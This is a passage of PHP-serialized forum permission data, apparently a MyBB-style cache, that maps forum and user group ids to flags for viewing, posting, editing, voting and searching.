16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"437\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"438\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"439\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"440\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"441\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"442\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"443\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"655\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"771\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:28;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"101\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"102\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"103\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"104\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"105\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"190\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"224\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"295\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"651\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"767\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:55;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"101\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"102\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"103\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"104\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"105\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"190\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"224\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"295\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"651\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"767\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:29;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"106\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"107\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"108\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"109\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"110\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:1